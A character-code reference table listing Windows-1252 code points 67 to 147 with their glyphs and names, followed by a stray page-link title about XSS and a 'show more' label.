67 C C C C Latin capital letter C
68 D D D D Latin capital letter D
69 E E E E Latin capital letter E
70 F F F F Latin capital letter F
71 G G G G Latin capital letter G
72 H H H H Latin capital letter H
73 I I I I Latin capital letter I
74 J J J J Latin capital letter J
75 K K K K Latin capital letter K
76 L L L L Latin capital letter L
77 M M M M Latin capital letter M
78 N N N N Latin capital letter N
79 O O O O Latin capital letter O
80 P P P P Latin capital letter P
81 Q Q Q Q Latin capital letter Q
82 R R R R Latin capital letter R
83 S S S S Latin capital letter S
84 T T T T Latin capital letter T
85 U U U U Latin capital letter U
86 V V V V Latin capital letter V
87 W W W W Latin capital letter W
88 X X X X Latin capital letter X
89 Y Y Y Y Latin capital letter Y
90 Z Z Z Z Latin capital letter Z
91 [ [ [ [ left square bracket
92 \ \ \ \ reverse solidus
93 ] ] ] ] right square bracket
94 ^ ^ ^ ^ circumflex accent
95 _ _ _ _ low line
96 grave accent
97 a a a a Latin small letter a
98 b b b b Latin small letter b
99 c c c c Latin small letter c
100 d d d d Latin small letter d
101 e e e e Latin small letter e
102 f f f f Latin small letter f
103 g g g g Latin small letter g
104 h h h h Latin small letter h
105 i i i i Latin small letter i
106 j j j j Latin small letter j
107 k k k k Latin small letter k
108 l l l l Latin small letter l
109 m m m m Latin small letter m
110 n n n n Latin small letter n
111 o o o o Latin small letter o
112 p p p p Latin small letter p
113 q q q q Latin small letter q
114 r r r r Latin small letter r
115 s s s s Latin small letter s
116 t t t t Latin small letter t
117 u u u u Latin small letter u
118 v v v v Latin small letter v
119 w w w w Latin small letter w
120 x x x x Latin small letter x
121 y y y y Latin small letter y
122 z z z z Latin small letter z
123 { { { { left curly bracket
124 | | | | vertical line
125 } } } } right curly bracket
126 ~ ~ ~ ~ tilde
127 DEL
128 € euro sign
129 NOT USED
130 ‚ single low-9 quotation mark
131 ƒ Latin small letter f with hook
132 „ double low-9 quotation mark
133 … horizontal ellipsis
134 † dagger
135 ‡ double dagger
136 ˆ modifier letter circumflex accent
137 ‰ per mille sign
138 Š Latin capital letter S with caron
139 ‹ single left-pointing angle quotation mark
140 Œ Latin capital ligature OE
141 NOT USED
142 Ž Latin capital letter Z with caron
143 NOT USED
144 NOT USED
145 ‘ left single quotation mark
146 ’ right single quotation mark
147 “ left double quotation mark
Exploiting XSS - Meta Tag 😎🔥
显示更多